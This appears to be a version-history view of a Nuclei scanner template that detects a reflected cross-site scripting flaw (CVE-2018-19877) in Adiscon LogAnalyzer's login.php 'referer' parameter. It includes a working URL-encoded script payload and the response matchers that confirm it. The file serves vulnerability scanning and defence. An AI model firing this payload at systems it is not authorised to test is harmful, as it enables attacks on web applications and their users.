2022-07-20 07:34:46 +00:00
|
|
|
id: CVE-2018-19877
|
|
|
|
|
|
|
|
info:
|
2022-09-08 13:28:46 +00:00
|
|
|
name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
|
2022-07-20 07:34:46 +00:00
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
2022-09-08 13:28:46 +00:00
|
|
|
Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
|
2022-07-21 10:02:22 +00:00
|
|
|
reference:
|
|
|
|
- https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
|
|
|
|
- https://www.exploit-db.com/exploits/45958/
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19877
|
2022-07-21 10:02:22 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2018-19877
|
|
|
|
cwe-id: CWE-79
|
2022-07-20 10:45:58 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: adiscon,xss,edb,cve,cve2018
|
2022-07-20 07:34:46 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-20 10:45:58 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"
|
2022-07-20 07:34:46 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-07-20 10:45:58 +00:00
|
|
|
- 'value=""><script>confirm(document.domain)</script>'
|
2022-07-20 07:34:46 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-09-08 13:28:46 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/31
|